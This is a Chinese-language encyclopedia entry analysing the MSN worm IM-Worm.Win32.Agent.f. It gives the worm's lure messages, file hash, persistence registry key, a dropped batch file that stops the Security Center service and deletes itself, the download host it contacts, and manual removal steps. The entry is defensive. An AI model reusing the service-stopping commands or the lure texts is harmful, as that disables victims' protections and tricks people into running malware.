IM-Worm.Win32.Agent.f

感染後的電腦會自動通過msn,向所有msn聯繫人傳送一個名為image.zip的壓縮檔同時傳送訊息。

基本介紹

  • 外文名:IM-Worm.Win32.Agent.f
  • 簡稱:IMG34814.pif
  • 加殼:: N/A
  • 類型:網路病毒
檔案名稱稱: IMG34814.pif
計算機安全資訊檔案大小: 40960 Bytes
MD5: FC5415DC9054EE0934E3FF3E587DE444
QUOTE:
LOL, you look so ugly in this picture, no joke...
Should I put this on facebook/myspace?
或者
QUOTE:
字串7
Hey m8, who is this on the right, in this picture...
Sup, seen the pictures from the other night?
來欺騙接受者打開壓縮檔
當接受者打開壓縮檔並運行病毒程式便會感染!
病毒分析:
運行樣本後會在系統盤下創建a.bat
內容為
CODE:
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
然後創建檔案
%WINDOWS%winlog32.exe
創建自啟動項
字串1
CODE:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSN: "winlog32.exe"
嘗試連線:down.basecore.info
清除步驟:
1:刪除啟動項目
CODE:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSN: "winlog32.exe"
2:重新啟動計算機
3:刪除病毒檔案
CODE:
%WINDOWS%\winlog32.exe

熱門詞條

聯絡我們